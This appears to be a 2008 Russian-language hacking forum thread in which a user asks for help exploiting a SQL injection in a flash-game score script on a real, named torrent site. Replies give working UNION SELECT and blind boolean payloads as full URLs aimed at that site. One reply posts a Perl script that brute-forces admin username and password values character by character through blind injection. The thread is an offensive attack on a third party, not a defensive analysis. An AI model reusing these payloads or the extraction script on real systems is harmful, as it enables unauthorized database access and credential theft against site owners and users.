sql inj in flash.php

Discussion in 'Уязвимости' started by Elesar, 24 Apr 2008.

Thread Status:
Not open for further replies.
  1. Elesar

    Elesar New Member

    Joined:
    20 Dec 2003
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Нашел иньекцию в скрипте на сайте, долго перебирал колличество полей для выборки, ничего не получилось(всегда пишет The used SELECT statements have a different number of columns).

    Погуглив по параметрам скрипта нашел движок, оттуда достал весь запрос : SELECT * FROM flashscores WHERE game = ".$gameID." ORDER BY score DESC LIMIT 10;

    Так-же достоверно узнал колличество полей: 5

    Подскажите, как правильно составить sql inj?


    PHP:
    <?
    if(isset(
    $_GET["gameid"]))
    {

    $gameID=$_GET["gameid"];

     
    $sql "SELECT * FROM flashscores WHERE game = ".$gameID." ORDER BY score DESC LIMIT 10;<br>";
        
    $result MySQL_QUERY($sql);
        echo 
    "111:".$sql;
        while(
    $scores MySQL_FETCH_ARRAY($result))
        {
        
    $userresult MySQL_QUERY("SELECT * FROM users WHERE id = ".$scores["user"].";");
        
    $user MySQL_FETCH_ARRAY($userresult);
         
    $username $user["username"];
          
    $ranking MySQL_QUERY("SELECT COUNT(*) FROM flashscores WHERE game = ".$gameID." AND score > ".$scores["score"].";") OR DIE(MySQL_ERROR());
          if(
    $rankrow mysql_fetch_row($ranking))
          {
                   
    $rank $rankrow[0]+1;
                   }else{
                   
    $rank 1;
                   }
                   if(
    $gameID 9)
                    {
                    if(
    $scores["user"]==$CURUSER["id"])
                     {
                print(
    "<TR style=\"background-color: #BBBBBB\"><TD>".$rank."</TD><TD WIDTH=75%>".$username."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>");
                }else{
                print(
    "<TR><TD>".$rank."</TD><TD>".$username."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>");
                }
                }else{
                if(
    $scores["user"]==$CURUSER["id"])
                {
                print(
    "<TR style=\"background-color: #BBBBBB\"><TD>".$rank."</TD><TD WIDTH=75%>".$username."</TD><TD>".$scores["level"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>");
                }else{
                print(
    "<TR><TD>".$rank."</TD><TD>".$username."</TD><TD>".$scores["level"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>");
                }
          }
      }

      
    $sql "SELECT * FROM flashscores WHERE game = ".$gameID." AND user = ".$CURUSER["id"]." ORDER BY score DESC LIMIT 1;";
      echo 
    "222:".$sql;
      
    $yourresult MySQL_QUERY($sql) OR DIE(MySQL_ERROR());
      if(
    $yourscore MySQL_FETCH_ARRAY($yourresult))
      {
              
    $yourhighscore $yourscore["score"];
              
    $yourlevel $yourscore["level"];
              
    $yourranking MySQL_QUERY("SELECT COUNT(*) FROM flashscores WHERE game = ".$gameID." AND score > ".$yourhighscore.";") OR DIE(MySQL_ERROR());
              if(
    $ranking mysql_fetch_row($yourranking))
              {
                       
    $yourrank $ranking[0]+1;
              }else{
                       
    $yourrank 1;
              }
              if(
    $yourrank>10)
              {
              if(
    $gameID 9)
              {
               print(
    "<TR style=\"background-color: #BBBBBB\"><TD>".$yourrank."</TD><TD WIDTH=75%>".$CURUSER["username"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$yourhighscore."</div></TD></TR>");
               }else{
               print(
    "<TR style=\"background-color: #BBBBBB\"><TD>".$yourrank."</TD><TD WIDTH=75%>".$CURUSER["username"]."</TD><TD>".$yourlevel."</TD><TD><div style=\"text-align:right;width:100%;\">".$yourhighscore."</div></TD></TR>");
               }
               }
      }
      print(
    "</TABLE><P>");
      }else{
               print(
    "<TABLE WIDTH=100%><TR><TD><center><B>".$_GET["gamename"]."</B></center></TD></TR>");
          print(
    "<TR><TD>Sorry, we cannot save scores of this game!</TD></TR>");
          print(
    "</TABLE>");
    }
    end_table();
    ?>
     
    1 person likes this.
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    flash.php?gameid=-1+union+select+1,2,3,4,5/*
    и юзаешь поле, которое выводится

    add

    вот например
    http://geotorrents.com/flash.php?gameURI=snake.swf&gamename=Snake&gameid=0x3927%20union%20select%201,2,3,4,5/*
    только ничего не выводится...
     
    #2 Piflit, 24 Apr 2008
    Last edited: 24 Apr 2008
  3. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    если не выводится то это обычная слепая иньекция ..
    // не проверял
     
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    Запрос возвращает несколько результатов (с 5ью полями и с 1 (count()), поэтому вывода не будет.
    посимвольный идет на ура

    http://geotorrents.com/flash.php?gameURI=snake.swf&gamename=Snake&gameid=1+and+substring(version(),1,1)=5/*
     
    3 people like this.
  5. Elesar

    Elesar New Member

    Joined:
    20 Dec 2003
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Что максимум можно выжать из этого бага?
     
  6. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    тоже самое что из обычной скули, только посимвольно
     
  7. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Вот пример сплоита , заюзай тока со своей скулей!

    Code:
    #!/usr/bin/perl -w
    
    use IO::Socket;
    use strict;
    
    #
    # Benchmark brute sql tool
    #
    
    my $delay	= "80000";
    my $stp =0;
    
    my $host        = "";  -------урл хоста
    my $dir         = ""; ------директория
    if ($ARGV[2] ) { $delay = $ARGV[2]; }
    
    print "\nTarget url : ".$host.$dir."\n\n";
    $host =~ s/(http:\/\/)//;
    
    my @array = ("username","password"); ---название columns в бд
    
    print "--== Trying to perform sql injection ==--\n\n";
    sleep(1);
    
    &sploit();
    
    
    sub sploit() {
    	my $x 		= "";
    	my $i		= "";
    	my $string	= "";
    	my $res		= "1";
    	
    	for ( $x=0; $x<=$#array; $x++ ) {
    
    		my $j = 1;
    		$res  = 1;
    		while ($res) {
    			for ($i=32;$i<=127;$i++) {
    				$res = 0;
    				
    				if ( $x eq 1 ) {
    					next if ( $i < 48 );
    					next if ( ( $i > 57 ) and ( $i < 97 ) );
    					next if ( $i > 102 );
    				}
    								my $val  = "пУТЬ ДО СКУЛИ ВИДА (index.php?id=1')";				
                                    my $tmp = "И САМА СКУЛЮ ДЛЯ ПЕРЕБОРА";
    				
    				$tmp =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
    
                                    $val .= $tmp;
    				
    				
                                    my $data=$dir.$val;
    				my $start = time();
    	
    				my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed\n\n";
    				
                                    print $req "GET $data HTTP/1.1\r\n";
    				print $req "Host: $host\r\n";
    				print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux)\r\n";
    				print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    				print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
    				print $req "Accept-Encoding: gzip,deflate\r\n";
    				print $req "Keep-Alive: 300\r\n";
    				print $req "Connection: Keep-Alive\r\n";
    				print $req "Cache-Control: no-cache\r\n";
    				print $req "Connection: close\r\n\r\n";
    				
    				while (my $result = <$req>) {
                                            if ( $result =~ /Subquery returns more than/ ) {
                                                   $string .= chr($i);
    					       print "\n\tFound : ".chr($i)."\n\n";
    					       $res = 1;
                                                   $stp=1;
                                            }
    
    					if ( $result =~ /404 Not Found/ ) {
    						printf "\n\nFile not found.\n\n";
    						print "\n\n$result\n\n";
    						exit;
    					}
    					if ( $result =~ /400 Bad Request/ ) {
    						printf "\n\nBad request.\n\n";
    						print "\n\n$result\n\n";
    						exit;
    					}
    				}
                                    if($stp > 0)
                                    {
                                     $stp=0;
                                     last;
                                    }
    				my $end = time();
    				my $dft = $end - $start;
    				print "$dft sec    ";				
    
    				print "\tTrying : ".chr($i)."\n";
    			}
    			$j++;
    			if ( !$res ) {
    				$array[$x] = $string;
    				$string = "";
    			}
    		}
            }
    	print "\n----------------------\n";
    	print "Admin username : $array[0]\n";
    	print "Admin password : $array[1]\n\n";
    }
    
    sub usage() {
        print "\n \n";
        print " \n";
        print " \n\n";
        print "ay\n";
        print "by fly\n\n";
        exit();
    }
    
     
    1 person likes this.
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    #
    # Benchmark brute sql tool
    #

    а при чем тут это ?))))
     
  9. Elesar

    Elesar New Member

    Joined:
    20 Dec 2003
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Был бы очень вам благодарен за небольшой пример...
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    http://injection.rulezz.ru/mysql_char_brute.html
     
    _________________________
  11. zythar

    zythar Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    517
    Likes Received:
    109
    Reputations:
    5
    помниться была такая утилита.
    для автоматизации проведения слепых sql inj. могу выложить
    sqlmap называлась кажись.
     
  12. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    Загляните в Избранное на форуме, тулзы от Elekt'а
     
Loading...
Thread Status:
Not open for further replies.